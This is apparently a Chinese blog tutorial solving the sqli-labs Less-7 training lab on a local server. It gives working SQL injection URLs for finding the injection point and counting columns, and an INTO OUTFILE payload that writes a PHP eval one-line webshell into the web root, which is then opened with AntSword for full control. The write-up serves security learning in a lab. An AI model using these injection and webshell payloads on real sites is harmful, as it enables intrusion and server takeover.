摘要
本篇文章主要介绍了如何使用webshell上传一句话木马到sqli-labs的Less-7题目中,以此来实现对目标网站的控制。其中,通过HackBar插件判断注入点,通过order by语句判断字段数,通过union select语句注入一句话木马,最终使用蚁剑连接实现对目标网站的控制。
前言
这章主要考点就是webshell上传,由于我们docker部署的mysql无法上传,我们这章启用我们windows部署的sqli-labs,注意不是我屈服了,而是我不想半途而废,给大家一个完整的学习之路
准备
开启phpstudy,开启apache服务以及mysql服务
实验环节
浏览器访问Less-7
http://127.0.0.1/sqli-labs-master/Less-7/
打开HackBar插件
判断是否存在注入
http://127.0.0.1/sqli-labs-master/Less-7/?id=1'
#id=1',初步判断字符串注入
分析是否存在括号及其个数
http://127.0.0.1/sqli-labs-master/Less-7/?id=1') and 1=1 -- xz #一个括号页面还是显示报错
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and 1=1 -- xz #两个括号页面显示正常,由此可推断出,这是带双括号的单引号注入
看到outfile分析存在文件上传注入
判断字段数
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) order by 4 -- xz
实验环节
1、先判断题目的绝对路径,由于本题没有回显报错,所以无法获得路径,但是之前的1-6题都有回显报错,可以从这块入手,我这里用的是Less-1
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,@@datadir -- xz
#由此可以看出网站的绝对路径是D:\phpstudy_pro\WWW,通过了解sqli-labs的结构可以得出完整路径为D:\phpstudy_pro\WWW\sqli-labs-master\Less-7
2、查看读写权限
http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 -- xz
#返回正常,说明具有文件读写权限
导入一句话木马
http://127.0.0.1/sqli-labs-master/Less-7/?id=-1'))union select 1,"<?php eval($_REQUEST[cz])?>",3 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\shell.php" -- xz
#可以看出shell.php文件已经成功上传
蚁剑连接
http://192.168.1.40/sqli-labs-master/Less-7/shell.php
#这里的ip地址是我本机的ip地址,因为蚁剑在虚拟机,所以连接要带ip地址
成功登录,我们可以在文件目录下操作,也可以在控制台上进行任何操作
评论区